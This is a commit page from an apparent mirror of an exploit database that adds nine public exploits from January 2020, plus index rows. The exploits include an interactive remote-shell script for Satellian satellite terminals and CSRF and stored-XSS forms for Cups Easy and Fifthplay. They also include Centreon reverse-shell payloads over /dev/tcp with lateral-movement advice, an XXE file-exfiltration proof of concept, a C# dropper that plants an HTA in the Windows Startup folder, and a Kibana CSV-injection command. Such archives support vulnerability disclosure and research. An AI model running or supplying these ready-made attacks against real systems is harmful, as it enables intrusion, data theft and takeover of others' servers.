bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-01-30

Browse source 
9 changes to exploits/shellcodes

XMLBlueprint 16.191112 - XML External Entity Injection
Microsoft Windows 10 - Theme API 'ThemePack' File Parsing
Kibana 6.6.1 - CSV Injection
Liferay CE Portal 6.0.2 - Remote Command Execution
Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)
Satellian 1.12 - Remote Code Execution
Centreon 19.10.5 - 'Pollers' Remote Command Execution
Centreon 19.10.5 - 'centreontrapd' Remote Command Execution
Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting
This commit is contained in:
Offensive Security 2020-01-30 05:02:05 +00:00
parent 0cd38b15b8
commit 3b5a0d91fe
10 changed files with 772 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

96
exploits/hardware/webapps/47976.py Executable file
View file

@ -0,0 +1,96 @@
# Exploit Title: Satellian 1.12 - Remote Code Execution
# Date: 2020-01-28
# Exploit Author: Xh4H
# Vendor Homepage: https://www.intelliantech.com/?lang=en
# Version: v1.12+
# Tested on: Kali linux, MacOS
# CVE : CVE-2020-7980
# Github repository: https://github.com/Xh4H/Satellian-CVE-2020-7980
# xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>
# ________________________________________
# (__) / \
# (oo) ( Intellian Satellite Terminal PoC )
# /-------\/ --' \________________________________________/
# / | ||
# * ||----||
# Performing initial scan. Listing available system binaries.
# Starting request to http://<redacted>
# Executing command /bin/ls /bin
# acu_server
# acu_tool
# addgroup
# adduser
# ...
# Satellian $ id
# uid=0(root) gid=0(root)
import requests
import argparse
import sys
import calendar
import time
from termcolor import colored
def cprint(text, color): # colored print
sys.stdout.write(colored(text + "\n", color, attrs=["bold"]))
def httpize(url):
if not url.startswith("http"):
cprint("Missing protocol, using http . . .", "yellow")
url = "http://" + url
return url
def send_command(url, command, verbose):
RCE = {"O_":"A","V_":1,"S_":123456789,"F_":"EXEC_CMD","P1_":{"F":"EXEC_CMD","Q":command}}
string_to_split = '''"SUCCESS_"
},'''
if verbose:
cprint("Starting request to %s" % url, "yellow")
cprint("Executing command %s" % command, "yellow")
a = requests.post(url + '/cgi-bin/libagent.cgi?type=J&' + str(calendar.timegm(time.gmtime())) + '000', json=RCE, cookies={'ctr_t': '0', 'sid': '123456789'})
command_output = a.content[a.content.find(string_to_split):-2].replace(string_to_split, '')
if len(command_output) < 4 and verbose:
cprint("Target doesn't seem to be vulnerable\nExiting.", 'red')
sys.exit()
print command_output
cprint("""
________________________________________
(__) / \\
(oo) ( Intellian Satellite Terminal PoC )
/-------\\/ --' \\________________________________________/
/ | ||
* ||----||
""", "green")
parser = argparse.ArgumentParser(description="Satellian: A PoC script for CVE-2020-7980")
parser.add_argument("-u", "--url", help="Base url")
args = parser.parse_args()
if args.url is None:
cprint("Missing arguments.\nUsage example:\n" + sys.argv[0] + " -u http://10.10.10.14\n", "red")
sys.exit()
url = httpize(args.url)
def main():
cprint("Performing initial scan. Listing available system binaries.", "green")
send_command(url, '/bin/ls /bin', True)
while True:
command = raw_input('Satellian $ ')
send_command(url, command, False)
if __name__ == '__main__':
try:
main()
except Exception as e:
print e
print "\nAn error happened."

120
exploits/hardware/webapps/47979.txt Normal file
View file

@ -0,0 +1,120 @@
# Exploit Title: Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting
# Date: 2020-01-29
# Exploit Author: LiquidWorm
# Vendor: Fifthplay NV
# Vendor Homepage: https://www.fifthplay.com
# Version: 2019.2_HP
# Tested on: Linux
# CVE : -
Fifthplay S.A.M.I - Service And Management Interface Unauthenticated Stored XSS
Vendor: Fifthplay NV
Product web page: https://www.fifthplay.com
Affected version: Platform: HAM V1.2
HAM V1.1
HAM V1.0
DINHAM 10W
Image Version: 2019.3-20190605144803
2019.2_HP-20190808154634
2018.4_HP-20181015152950
2018.2-20180516100815
2017.2_HP-20180213083050
2013.4_HP-201309301203
AMP Version: 2019.2_HP
2018.4_HP
2017.2_HP
2013.4_HP
R20.19.03
R20.18.02
Fix: 2017.2-HP4
2018.4_HP3
2018.5_HP7
2019.2_HP3
2019.3_HP1
Summary: Fifthplay is a Belgian high-tech player and a subsidiary of Niko Group.
We specialise in enriching smart homes and buildings for almost 10 years, and in
services that provide comfort and energy. Our gateway provides a modular approach
to integrating old and new technologies, such as smart meters, optical meters,
sockets, switches. Fifthplay is a trendsetter with regards to smart homes and buildings
and one of the sector's most innovative companies.
Desc: The application suffers from an unauthenticated stored XSS through POST request.
The issue is triggered when input passed via several parameters is not properly
sanitized before being returned to the user. This can be exploited to execute arbitrary
HTML and script code in a user's browser session in context of an affected site. The
application interface also allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited
to perform certain actions if a user visits a malicious web site.
Tested on: lighttpd/1.4.33
PHP/5.4.33
PHP/5.3.19
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5561
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5561.php
29.09.2019
--
Stored XSS:
-----------
<html>
<body>
<form action="http://192.168.11.1/?page=networksettings" method="POST">
<input type="hidden" name="server" value='"><script>prompt(251)</script>' />
<input type="hidden" name="port" value='"><script>prompt(252)</script>' />
<input type="hidden" name="auth" value="1" />
<input type="hidden" name="user" value='"><script>prompt(253)</script>' />
<input type="hidden" name="pass" value='"><script>prompt(254)</script>' />
<input type="hidden" name="submit" value="Change" />
<input type="submit" value="Write" />
</form>
</body>
</html>
Set proxy CSRF:
---------------
<html>
<body>
<form action="http://192.168.11.1/?page=networksettings" method="POST">
<input type="hidden" name="server" value="proxy.segfault.mk" />
<input type="hidden" name="port" value="8080" />
<input type="hidden" name="auth" value="1" />
<input type="hidden" name="user" value="testuser" />
<input type="hidden" name="pass" value="testpass" />
<input type="hidden" name="submit" value="Change" />
<input type="submit" value="Write" />
</form>
</body>
</html>
Delete proxy CSRF:
------------------
<html>
<body>
<form action="http://192.168.11.1/?page=networksettings" method="POST">
<input type="hidden" name="server" value="proxy.segfault.mk" />
<input type="hidden" name="port" value="8080" />
<input type="hidden" name="auth" value="1" />
<input type="hidden" name="user" value="testuser" />
<input type="hidden" name="pass" value="testpass" />
<input type="hidden" name="delete" value="Delete" />
<input type="submit" value="Clear" />
</form>
</body>
</html>

30
exploits/java/webapps/47972.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Liferay CE Portal 6.0.2 - Remote Command Execution
# Google Dork: N/A
# Date: 2020-01-29
# Exploit Author: Berk Dusunur
# Vendor Homepage: https://www.liferay.com/
# Software Link: https://sourceforge.net/projects/lportal/files/Liferay%20Portal/6.0.2/
# https://github.com/chakadev/Liferay-CE-Portal-Java-Deserialization
# Version: 6.0.2
# Tested on: MacOS
# CVE : N/A
#PoC
I already shared payloads in my github repo (Because payloads so small and
have a meta character). You must find the right syntax by brute-force
method.Payloads I share are for time-based proof of concept (sleep 10). The
application may not always output the command. That's why you should try
time-based payload while doing PoC.
POST /api/liferay HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
PAYLOADS HERE

45
exploits/php/webapps/47973.txt Normal file
View file

@ -0,0 +1,45 @@
# Title: Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)
# Date: 2020-01-28
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://sourceforge.net/u/ajayshar76/profile/
# Software Link: https://sourceforge.net/projects/cupseasy/files/cupseasylive-1.0/
# Version: 1.0
# Tested on Windows 10/Kali Rolling
# CVE: CVE-2020-8424, CVE-2020-8425
# The Cups Easy (Purchase & Inventory) 1.0 web application is vulnerable to Cross Site Request Forgery
# that would allow an attacker to change the Admin password and gain unrestricted
# access to the site or delete any user.
# Proof of Concept Code for Password Change:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://SITEADDRESS/cupseasylive/passwordmychange.php" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="password" value="PASSWORDHERE" />
<input type="hidden" name="change" value="Change" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Proof of concept for user delete:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://SITEADDRESS/cupseasylive/userdelete.php" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="delete" value="Delete" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

65
exploits/php/webapps/47977.txt Normal file
View file

@ -0,0 +1,65 @@
# Exploit Title: Centreon 19.10.5 - 'Pollers' Remote Command Execution
# Date: 2020-01-27
# Exploit Author: Omri Baso, Fabien Aunay
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7.7
# CVE : -
Centreon 19.10.5 Remote Command Execution Misc
Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Heath care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.
User input isn't sanitized for safe use - and it is possible to gain a Remote Code Execution of the server
hosting the Centreon Service leading to a full server takeover with the user "apache"
Steps:
1.) <BASEURL>/centreon/main.php?p=60803&type=3
Here we create the Command - can also be found under
Configuration > Commands > Miscellaneous
we Press "Add" -
Command Name: "misc"
Payload: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121
2.) go to: <BASEURL>/centreon/main.php?p=60901
Configuration > Pollers
Open "Central" Poller
add on "Post-Restart command"
the command "misc" we created
make Status "Enabled"
3.) Check the box "Post generation command" in the "Export Configuration" Tab
3.1) Restart Poller and get Shell.
┌─[root@vps]─[~]
└──╼ #nc -lnvp 1234
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:49184.
whoami
apache
id
uid=48(apache) gid=48(apache) groups=48(apache),990(centreon-engine),992(centreon-broker),993(nagios),994(centreon)
___________________________________________________________________

160
exploits/php/webapps/47978.txt Normal file
View file

@ -0,0 +1,160 @@
# Exploit Title: Centreon 19.10.5 - 'centreontrapd' Remote Command Execution
# Date: 2020-01-29
# Exploit Author: Fabien AUNAY, Omri Baso
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7
# CVE : -
###########################################################################################################
Centreon 19.10.5 Remote Command Execution centreontrapd
Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Heath care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.
It is possible to get a reverse shell with a snmp trap and gain a pivot inside distributed architecture.
Steps:
Objective 1 : Create a SNMP trap or use linkDown OID with special command in action 3
Objective 2 : Create passive service and use App-Monitoring-Centreon-Service-Dummy
Objective 3 : Assign service trap relation
Objective 4 : Get centreon id reverse shell
###########################################################################################################
# Objective 1 : Create or use SNMP trap OID with special command in action 3
- Configuration > SNMP Traps
[+] Trap name * : linkDown
[+] OID * : .1.3.6.1.6.3.1.1.5.3
[+] Special Command : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121
# Objective 2 : Create passive service and use App-Monitoring-Centreon-Service-Dummy
- Configuration > Services > Services by host
[+] Description * : TRAP RCE
[+] Linked with Hosts * : YOUR-LINKED-HOST
[+] Check Command * : App-Monitoring-Centreon-Service-Dummy
[+] DUMMYSTATUS : 0
[+] DUMMYOUTPUT : 0
[+] Passive Checks Enabled : YES
[+] Is Volatile : YES
[+] Service Trap Relation : Generic - linkDown
# Objective 3 : Assign service trap relation
- Configuration > SNMP Traps
- linkDown
- Relations
[+] Linked services : YOUR-LINKED-HOST - SERVICE DESCRIPTION
reload Central
Reload snmp config
# Objective 4 : Get centreon id reverse shell and think lateral
[+] Send your trap
snmptrap -v2c -c public 127.0.0.1 '' .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2
TIP: centreontrapd logfile:
2020-01-29 02:52:33 - DEBUG - 340 - Reading trap. Current time: Wed Jan 29 02:52:33 2020
2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (DISMAN-EVENT-MIB::sysUpTimeInstance). Will attempt to translate to a numerical OID
2020-01-29 02:52:33 - DEBUG - 340 - Translated to .1.3.6.1.2.1.1.3.0
2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (SNMPv2-MIB::snmpTrapOID.0). Will attempt to translate to a numerical OID
...
2020-01-29 02:52:33 - DEBUG - 340 - Trap found on service 'TRAP RCE' for host 'supervision_IT'.
...
2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launch specific command
2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launched command: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121
..
NOTE: Read the doc !!!
https://documentation-fr.centreon.com/docs/centreon/fr/latest/administration_guide/poller/ssh_key.html?highlight=keygen
The centreon id user shares configurations and instructions with satellite collectors trough SSH.
No passphrase used.
This allows you to move around the infrastructure after your RCE.
POC:
snmptrap -v2c -c public 127.0.0.1 '' .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2
nc -lvnp 12345
Ncat: Version 7.50
Ncat: Listening on :::12345
Ncat: Listening on 0.0.0.0:12345
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:38470.
id
uid=997(centreon) gid=994(centreon) groups=994(centreon),48(apache),990(centreon-engine),992(centreon-broker)
sudo -l
Matching Defaults entries for centreon on centreonlab:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty
User centreon may run the following commands on centreonlab:
(root) NOPASSWD: /sbin/service centreontrapd start
(root) NOPASSWD: /sbin/service centreontrapd stop
(root) NOPASSWD: /sbin/service centreontrapd restart
(root) NOPASSWD: /sbin/service centreontrapd reload
(root) NOPASSWD: /usr/sbin/service centreontrapd start
(root) NOPASSWD: /usr/sbin/service centreontrapd stop
(root) NOPASSWD: /usr/sbin/service centreontrapd restart
(root) NOPASSWD: /usr/sbin/service centreontrapd reload
(root) NOPASSWD: /sbin/service centengine start
(root) NOPASSWD: /sbin/service centengine stop
(root) NOPASSWD: /sbin/service centengine restart
(root) NOPASSWD: /sbin/service centengine reload
(root) NOPASSWD: /usr/sbin/service centengine start
(root) NOPASSWD: /usr/sbin/service centengine stop
(root) NOPASSWD: /usr/sbin/service centengine restart
(root) NOPASSWD: /usr/sbin/service centengine reload
(root) NOPASSWD: /bin/systemctl start centengine
(root) NOPASSWD: /bin/systemctl stop centengine
(root) NOPASSWD: /bin/systemctl restart centengine
(root) NOPASSWD: /bin/systemctl reload centengine
(root) NOPASSWD: /usr/bin/systemctl start centengine
(root) NOPASSWD: /usr/bin/systemctl stop centengine
(root) NOPASSWD: /usr/bin/systemctl restart centengine
(root) NOPASSWD: /usr/bin/systemctl reload centengine
(root) NOPASSWD: /sbin/service cbd start
(root) NOPASSWD: /sbin/service cbd stop
(root) NOPASSWD: /sbin/service cbd restart
(root) NOPASSWD: /sbin/service cbd reload
(root) NOPASSWD: /usr/sbin/service cbd start
(root) NOPASSWD: /usr/sbin/service cbd stop
(root) NOPASSWD: /usr/sbin/service cbd restart
(root) NOPASSWD: /usr/sbin/service cbd reload
(root) NOPASSWD: /bin/systemctl start cbd
(root) NOPASSWD: /bin/systemctl stop cbd
(root) NOPASSWD: /bin/systemctl restart cbd
(root) NOPASSWD: /bin/systemctl reload cbd
(root) NOPASSWD: /usr/bin/systemctl start cbd
(root) NOPASSWD: /usr/bin/systemctl stop cbd
(root) NOPASSWD: /usr/bin/systemctl restart cbd
(root) NOPASSWD: /usr/bin/systemctl reload cbd

62
exploits/windows/local/47974.txt Normal file
View file

@ -0,0 +1,62 @@
# Exploit Title: XMLBlueprint 16.191112 - XML External Entity Injection
# Exploit Author: Javier Olmedo
# Date: 2018-11-14
# Vendor: XMLBlueprint XML Editor
# Software Link: https://www.xmlblueprint.com/update/download-64bit.exe
# Affected Version: 16.191112 and before
# Patched Version: unpatched
# Category: Local
# Platform: XML
# Tested on: Windows 10 Pro
# CWE: https://cwe.mitre.org/data/definitions/611.html
# CVE: 2019-19032
# References:
# https://hackpuntes.com/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml/
# 1. Technical Description
# XMLBlueprint XML Editor version 16.191112 and before are affected by XML External Entity
# Injection vulnerability through the malicious XML file. This allows a malicious user
# to read arbitrary files.
# 2. Proof Of Concept (PoC)
# 2.1 Start a webserver to receive the connection.
python -m SimpleHTTPServer 80
# 2.2 Upload the payload.dtd file to your web server.
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:80/?%file;'>">
%all;
# 2.3 Create a secret.txt file with any content in desktop.
# 2.4 Open poc.xml and click XML -> Validate
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "file:///C:\Users\jolmedo\Desktop\secret.txt">
<!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
# 2.5 Your web server will receive a request with the contents of the secret.txt file
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 -
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 -
# 3. Timeline
# 13, november 2019 - [RESEARCHER] Discover
# 13, november 2019 - [RESEARCHER] Report to vendor support
# 14, november 2019 - [DEVELOPER] Unrecognized vulnerability
# 15, november 2019 - [RESEARCHER] Detailed vulnerability report
# 22, november 2019 - [RESEARCHER] Public disclosure
# 4. Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c)
# Javier Olmedo

147
exploits/windows/local/47975.c Normal file
View file

@ -0,0 +1,147 @@
# Exploit Title: Microsoft Windows 10 - Theme API 'ThemePack' File Parsing
# Google Dork: n/a
# Date: 2020-10-28
# Exploit Author: Eduardo Braun Prado
# Vendor Homepage: http://www.microsoft.com/
# Software Link: http://www.microsoft.com/
# Version: 10 v.1803 (17134.407)
# Tested on: Windows 7, 8.0, 8.1, 10, Server 2012, Server 2012 R2, Server 2016, Server 2019
# CVE : CVE-2018-8413
# Discovered by: Eduardo Braun Prado
[Details]
Microsoft 'themepack' files are classic '.theme' files compressed for
sharing over the internet. Theme files
allows users to customize visual aspects of their device, such as icons
for known features like 'My computer'
and 'trash bin' folders, the default screensaver (which by the way
allowed attackers to run '.scr' files located
on shares upon applying a Theme, in the past. Refer to: CVE-2013-0810).
ThemePack file type uses Microsoft 'CAB' format. The parser contains a
vulnerability that allows attackers
to create arbitrary files on arbitrary locations on the user´s system,
by using the classic
'parent directory' technique, and thus could lead to creation of some
executable files on the
startup folder. This executable will be run on next logon.
Conditions:
1) The 'themepack' file must contain a valid '[dot] theme' file.
The parser allows creating '.theme' files on arbitrary locations, but
the extension must be
'.theme'. There´s a trick, though, to overcome this:
NTFS Alternate Data Streams.
By using a specially crafted name like "abc.hta:[dot] theme" it´s
possible to trick the parser into
dropping a file with an '[dot] hta' extension instead of the legitimate
'[dot] theme', potentially allowing
attackers to compromise the affected systems. The '[dot] hta' extension
is a good choice since you can
merge valid code with arbitrary text or binary files.
Note: Patched on October, 2018 Microsoft monthly patch.
[PoC]
Proof of concept code that drops an 'hta' file to startup dir.
Instructions:
- Create a new project on MS Visual Studio (any version, included free
ones like 'Express'), choose 'Console Application'
and at 'program . cs' replace the code with the code below
Note: Source code targets dot NET 4.0 and up (previous versions might
work fine though!)
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace ThemePack
{
class Program
{
static void Main(string[] args)
{
String exeDir = AppDomain.CurrentDomain.BaseDirectory;
Directory.SetCurrentDirectory(exeDir);
string tmpPath = Path.GetTempPath();
string tpd =
"4D53434600000000AB010000000000002C000000000000000301010001000000000000009500000001000100930100000000000000003C508108200061612E2E5C2E2E5C2E2E5C2E2E5C2E2E5C2E2E5C726F616D696E675C6D6963726F736F66745C77696E646F77735C7374617274206D656E755C70726F6772616D735C737461727475705C6162632E6874613A2E7468656D6500B60133780E019301434B4D51C16A023110BD07F20F5EBC5A85D2163405DDB5871645CCB215BA1ED265C0E024B364E261FDFA66534BBD8499F7DE4CDE4BE68B5374F82AC55775020747294ACB1D9A7E6B1CA88CED4C7B1ED517F4522459413E06C2D1CE78C0A6043E47EAD2D8A741EC4C074149515984FF7E7A47EAD823A85982762646085EE5A5B5E58BC14CF231732735D63D47707BA2386E02305D420BDCC4C112374B08948F8963CE7352148474BB614BC119CC8014DA5EFF90A1BC09EDD5444B3ED76A7A785A3D3FAE5EDE8AE43E18CF9D09E0DB5ECD06B5EB88ED201EDA3BAF3504CEE834A7F84E56937B5DECB77A59AF27EBC3FA37DEC6A424213FA60684365248BA4DA537AA5CAEDECB8F4A8AF9E2E1F6133F";
string tpf = exeDir + "\\C00L.themepack";
Console.WriteLine("\n\n
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
\n Microsoft Windows Theme API 'ThemePack' File Parsing Vulnerability
PoC (CVE-2018-8413) \n\n by: Eduardo Braun Prado \n\n
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++");
StreamWriter s = File.CreateText(tmpPath + "\\themepack000.h");
s.Write(tpd);
s.Close();
FileStream f = File.OpenRead(tmpPath + "\\themepack000.h");
String ax = "";
byte[] b = new byte[f.Length];
UTF8Encoding temp = new UTF8Encoding(false);
while (f.Read(b, 0, b.Length) > 0)
{
ax = ax + temp.GetString(b);
}
String bx = ax.ToString();
String cx = "";
byte[] b02 = new byte[f.Length / 2];
for (int i = 0; i < f.Length; i += 2)
{
cx = bx.Substring(i, 2);
b02[i / 2] = Convert.ToByte(cx, 16);
}
File.WriteAllBytes(tpf, b02);
if (File.Exists(tpf))
{
long fsize = new FileInfo(tpf).Length;
if (fsize != 0)
{
Console.WriteLine("\n\n\n Done! 'C00L." +
"themepack' file created in the current directory. Vulnerable systems
should plant an HTA on startup dir.");
}
}
}
}
}

38
exploits/windows/webapps/47971.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: Kibana 6.6.1 - CSV Injection
# Google Dork: inurl:"/app/kibana" intitle:"Kibana"
# Date: 2020-01-15
# Exploit Author: Aamir Rehman
# Vendor Homepage: https://www.elastic.co/kibana
# Software Link: https://www.elastic.co/downloads/
# Version: v6.6.1 possibly latest versions
# Tested on: Kibana 6.6.1 - Firefox/Windows
# References:
# https://the-it-wonders.blogspot.com/2020/01/csv-injection-in-kibana-661-possibly.html
# https://github.com/elastic/kibana/issues/56081
# Software description:
Kibana is an open source data visualization dashboard for Elasticsearch. It provides visualization capabilities on top of the content indexed on an Elasticsearch cluster. Users can create bar, line and scatter plots, or pie charts and maps on top of large volumes of data.
# Technical Details & Impact:
Most of the kibana applications are having authentication disabled any malicious user can inject csv payload in visualization section of dashboard and It's possible to run malicious command on logged in user computer. Even though an alert message is shown on opening the file but users usually ignore such pop-ups since file is from known source.
# POC
1. Click on Dashboard tab and select any dashboard from the list. I would suggest to select the dashboard which has Gauge or Line visualization type.
2. Once you are on dashboard click on "Edit button" on top right of the page.
3. Click "gear (options)" button of any graphical view box.
4. It will open a options box click on "edit visualization".
5. It will open the edit page click on any "Blue play button" in front of any metric.
6. Here you can edit the metric's information; we will be exploiting the "Custom Label" field
7. In custom Label field enter your csv injection payload e.g. @SUM(1+1)*cmd|' /c calc'!A0.
8. All is done now click on Top "blue play button" to save the settings and click on SAVE button open top right of the page.
9. Go back to dashboard graphical view, you will see your csv payload their. Click on 3dots buttons on top of the graphical box click on "INSPECT".
10. It will open the export panel click on download csv and click formatted csv.
# Timeline
15-01-2020 - Vulnerability discovered
27-01-2020 - Vendor contacted
28-01-2020 - Vendor responded, not marking it as a security flaw. Git issue has been created. (https://github.com/elastic/kibana/issues/56081)
28-01-2020 Requested vendor for disclosure.
29-01-2020 - Full Disclosure

9
files_exploits.csv
View file

@ -10921,6 +10921,8 @@ id,file,description,date,author,type,platform,port
47957,exploits/linux/local/47957.rb,"Reliable Datagram Sockets (RDS) - rds_atomic_free_op NULL pointer dereference Privilege Escalation (Metasploit)",2020-01-23,Metasploit,local,linux, 47957,exploits/linux/local/47957.rb,"Reliable Datagram Sockets (RDS) - rds_atomic_free_op NULL pointer dereference Privilege Escalation (Metasploit)",2020-01-23,Metasploit,local,linux,
47962,exploits/windows/local/47962.c,"Ricoh Printer Drivers - Local Privilege Escalation",2020-01-22,pentagrid,local,windows, 47962,exploits/windows/local/47962.c,"Ricoh Printer Drivers - Local Privilege Escalation",2020-01-22,pentagrid,local,windows,
47965,exploits/windows/local/47965.py,"Torrent 3GP Converter 1.51 - Stack Overflow (SEH)",2020-01-27,boku,local,windows, 47965,exploits/windows/local/47965.py,"Torrent 3GP Converter 1.51 - Stack Overflow (SEH)",2020-01-27,boku,local,windows,
47974,exploits/windows/local/47974.txt,"XMLBlueprint 16.191112 - XML External Entity Injection",2020-01-29,"Javier Olmedo",local,windows,
47975,exploits/windows/local/47975.c,"Microsoft Windows 10 - Theme API 'ThemePack' File Parsing",2020-01-29,"Eduardo Braun Prado",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42269,3 +42271,10 @@ id,file,description,date,author,type,platform,port
47967,exploits/php/webapps/47967.txt,"Octeth Oempro 4.8 - 'CampaignID' SQL Injection",2020-01-28,"Bruno de Barros Bulle",webapps,php,80 47967,exploits/php/webapps/47967.txt,"Octeth Oempro 4.8 - 'CampaignID' SQL Injection",2020-01-28,"Bruno de Barros Bulle",webapps,php,80
47968,exploits/php/webapps/47968.txt,"Centreon 19.10.5 - Database Credentials Disclosure",2020-01-28,"Fabien AUNAY",webapps,php, 47968,exploits/php/webapps/47968.txt,"Centreon 19.10.5 - Database Credentials Disclosure",2020-01-28,"Fabien AUNAY",webapps,php,
47969,exploits/php/webapps/47969.txt,"Centreon 19.10.5 - Remote Command Execution",2020-01-28,"Fabien AUNAY",webapps,php, 47969,exploits/php/webapps/47969.txt,"Centreon 19.10.5 - Remote Command Execution",2020-01-28,"Fabien AUNAY",webapps,php,
47971,exploits/windows/webapps/47971.txt,"Kibana 6.6.1 - CSV Injection",2020-01-29,"Aamir Rehman",webapps,windows,
47972,exploits/java/webapps/47972.txt,"Liferay CE Portal 6.0.2 - Remote Command Execution",2020-01-29,"Berk Dusunur",webapps,java,
47973,exploits/php/webapps/47973.txt,"Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)",2020-01-29,J3rryBl4nks,webapps,php,
47976,exploits/hardware/webapps/47976.py,"Satellian 1.12 - Remote Code Execution",2020-01-29,Xh4H,webapps,hardware,
47977,exploits/php/webapps/47977.txt,"Centreon 19.10.5 - 'Pollers' Remote Command Execution",2020-01-29,"Omri Baso",webapps,php,
47978,exploits/php/webapps/47978.txt,"Centreon 19.10.5 - 'centreontrapd' Remote Command Execution",2020-01-29,"Fabien AUNAY",webapps,php,
47979,exploits/hardware/webapps/47979.txt,"Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting",2020-01-29,LiquidWorm,webapps,hardware,

Can't render this file because it is too large.